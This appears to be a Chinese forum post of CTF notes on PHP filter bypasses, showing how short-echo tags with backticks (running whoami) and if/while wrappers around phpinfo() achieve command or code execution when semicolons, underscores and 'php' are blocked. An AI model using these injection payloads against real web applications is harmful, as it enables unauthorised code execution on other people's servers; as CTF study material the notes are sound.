设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
记录奇奇怪怪php
返回列表
发帖
查看:
443
|
回复:
0
[TSD/原创]
记录奇奇怪怪php
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 19:31:58
|
显示全部楼层
|
阅读模式
适用人群:CTFer
已知:
php代码中不允许出现; (分号),_,php,等等
问如何构造危险函数:
案例:
<?=`whoami`?> 造成无分号命令执行
<?=`whoami` 造成无分号无结尾命令执行
其他函数:
<?= if(phpinfo()){} 利用if语句绕过分号的拦截,代码执行
<?= while(phpInfo()){} 造成代码执行
分号
,
执行
,
造成
,
代码
,
奇奇
相关帖子
•
【新手向】iapp的基础知识
•
【FUT】无限弹窗代码
•
【FUT】IAPP判断手机系统
•
【FUT】IAPP横条天气
•
【FUT】IAPP图片无限旋转
•
【FUT】iapp计算人品代码
•
【解忧】Java和操作系统交互细节
•
【LUR】各种网页挂马方式原理
•
【DMT】<web安全系列>代码审计,SQL漏洞发现
•
【phoe】邮件群发软件协议,发送速度快,不限制任何内容和行业,显示效果好
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表
发表于 2022-5-8 19:31:58
